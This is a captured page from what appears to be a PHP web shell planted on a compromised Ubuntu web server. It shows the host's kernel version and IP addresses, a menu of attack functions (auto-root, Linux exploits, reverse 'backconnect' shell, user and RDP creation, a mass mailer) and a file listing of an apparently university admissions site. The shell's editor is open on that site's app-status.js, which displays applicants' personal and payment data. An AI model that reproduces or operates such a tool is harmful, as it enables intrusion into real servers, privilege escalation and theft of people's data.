Linux ip-172-26-7-228 5.4.0-1103-aws #111~18.04.1-Ubuntu SMP Tue May 23 20:04:10 UTC 2023 x86_64
Apache
: 172.26.7.228 | : 13.58.105.80
Cant Read [ /etc/named.conf ]
5.6.40-24+ubuntu18.04.1+deb.sury.org+1
www-data
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
HASH IDENTIFIER
README
+ Create Folder
+ Create File
/
var /
www /
html /
pget /
js /
[ HOME SHELL ]
Name
Size
Permission
Action
admin
[ DIR ]
drwxrwxr-x
pg
[ DIR ]
drwxrwxr-x
.DS_Store
8
KB
-rwxrwxr-x
MainPageCompressed.js
341.08
KB
-rwxrwxr-x
add-course.js
11.37
KB
-rwxrwxr-x
admin.js
15.25
KB
-rwxrwxr-x
advanced-form-elements.js
5.41
KB
-rwxrwxr-x
app-status.js
5.95
KB
-rwxrwxr-x
compressed.js
440.45
KB
-rwxrwxr-x
control.js
18.43
KB
-rwxrwxr-x
demo.js
3.33
KB
-rwxrwxr-x
forgot-password.js
3.24
KB
-rwxrwxr-x
form_submit.js
1.3
KB
-rwxrwxr-x
helpers.js
576
B
-rwxrwxr-x
kusPhdAdm.js
50.93
KB
-rwxrwxr-x
kusPhdAdm_03082019.js
45.47
KB
-rwxrwxr-x
kusPhdAdm_04122018.js
30.02
KB
-rwxrwxr-x
kusPhdAdm_12122018.js
45.47
KB
-rwxrwxr-x
kusPhdAdm_17092018.js
29.67
KB
-rwxrwxr-x
kusPhdAdm_23092018.js
29.74
KB
-rwxrwxr-x
login.js
478
B
-rwxrwxr-x
script.js
3
B
-rwxrwxr-x
sign-in.js
4.29
KB
-rwxrwxr-x
sign-up.js
4.52
KB
-rwxrwxr-x
upload.js
5.64
KB
-rwxrwxr-x
upload_18092018.js
5.52
KB
-rwxrwxr-x
validate.js
9.29
KB
-rwxrwxr-x
Delete
Unzip
Zip
${this.title}
Close
Code Editor : app-status.js
var db = window.location.pathname.split("/")[2]; var db = window.location.pathname.split("/")[2]; // var $host_url = // "http://" + // window.location.host + // "/" + // window.location.pathname.split("/")[1] + // "/app.php?db=" + // db + // "&a="; var gdata = []; function loadAppStatus() { console.log($host_url); $.ajax({ type: "POST", async: false, url: $host_url + "getAppStatus", success: response => { response = JSON.parse(response); // console.log("totla",response); // console.log("resp1",response.data.obj1); var data = response.data.obj1; var data2 = response.data.obj2; if (response.error_code == 0) { $("#loadTab").load("app-status.html", function() { var html = ""; // for (var i = 0; i < data.length; i++) { // fappNo = data[i].fappno; // console.log("fapp=>", fappNo); // localStorage.setItem("fappno", fappNo); // //MOBILE = row['fmobileno']; // } var row = data[0]; if (row["fpaystatus"] == "success") { // $("#make_payment").hide(); } html += `<head> <label for="Name" style="padding-top: 17px;"><b style="font-size:17px; padding-left: 10px;">Name</b></label> <b style="padding-left: 130px; padding-right: 15px;">:</b> <h style="font-size:17px;"> ${row["fname"]}</h><br> <label for="Mobile"><b style="font-size:17px; padding-left: 10px;">Mobile No</b></label> <b style="padding-left: 94px; padding-right: 15px;">:</b> <h style="font-size:17px;"> ${row["fmobileno"]}</h><br> <label for="Application"><b style="font-size:17px; padding-left: 10px;">Application Number</b></label> <b style="padding-left: 9px; padding-right: 15px;">:</b> <h style="font-size:17px;" id = "htappno"> ${ row["fappno"] }</h><br> <label for="Status"><b style="font-size:17px; padding-left: 10px;">Payment Status</b></label> <b style="padding-left: 47px; padding-right: 15px;">:</b> <h style="font-size:17px;"> ${row["fpaystatus"]}</h><br> <label for="Date"><b style="font-size:17px; padding-left: 10px;">Payment Date</b></label> <b style="padding-left: 61px; padding-right: 15px;">:</b> <h style="font-size:17px;"> ${row["fpaydate"]}</h><br> <label for="Date"><b style="font-size:17px; padding-left: 10px;">Transaction ID</b></label> <b style="padding-left: 58px; padding-right: 15px;">:</b> <h style="font-size:17px;"> ${row["fpayid"]}</h><br> </head> `; if (response.error_code == -1) { alert("No Application found"); } html += `</table>`; $("#AppStat").html(html); var html = ""; for (var i = 0; i < data2.length; i++) { var row = data2[i]; var db = window.location.pathname.split("/")[2]; var degree = ""; if (db == "vskub") degree = "all"; else degree = row["degcode"]; if (db == "vskub") { html += `<tr> <td style='text-align:center; font-size: 17px;'>${i + 1}</td> <td style="font-size: 17px;">${row["fdegree"]}</td> <td style='text-align:center; font-size: 17px;'>${ row["fstatus"] }</td> <td style='text-align:center; font-size: 17px;'><button class="btn btn-primary btn-sm waves-effect font-16" onclick="rePrintApplication('${degree}')" > Print Application </button></td> </tr> `; } else { html += `<tr> <td style='text-align:center; font-size: 17px;'>${i + 1}</td> <td style="font-size: 17px;">${row["fdegree"]}</td> <td style='text-align:center; font-size: 17px;'>${ row["fstatus"] }</td> <td style='text-align:center; font-size: 17px;'><button class="btn btn-primary btn-sm waves-effect font-16" onclick="rePrintApplication('${degree}')" > Print Application </button></td> </tr> `; } } html += `</table>`; $("#Display").html(html); }); } } }); } // async function loadTable (){ // $.ajax({ // type: "POST", // async: false, // url: $host_url1 + "DisplayAppStatus", // data:{ // fappNo:localStorage.getItem("fappNo") // }, // success: response => { // var response = JSON.parse(response); // console.log("resp2",response); // // var { error_code, fappno, status } = response; // var error_code = response.error_code; // var data = response.data; // var status = response.status; // if (error_code == 0) { // $("#loadTab").load("app-status.html",function(){ // //var data = response.data; // var html=""; // for(var i=0; i<data.length;i++){ // var row = data[i]; // html += `<tr> // <td>${i+1}</td> // <td>${row['fdegree']}</td> // <td>${row['fstatus']}</td> // </tr> // `; // } // html +=`</table>`; // $('#Display').html(html); // }); // } // } // }); // return 1; // }
Close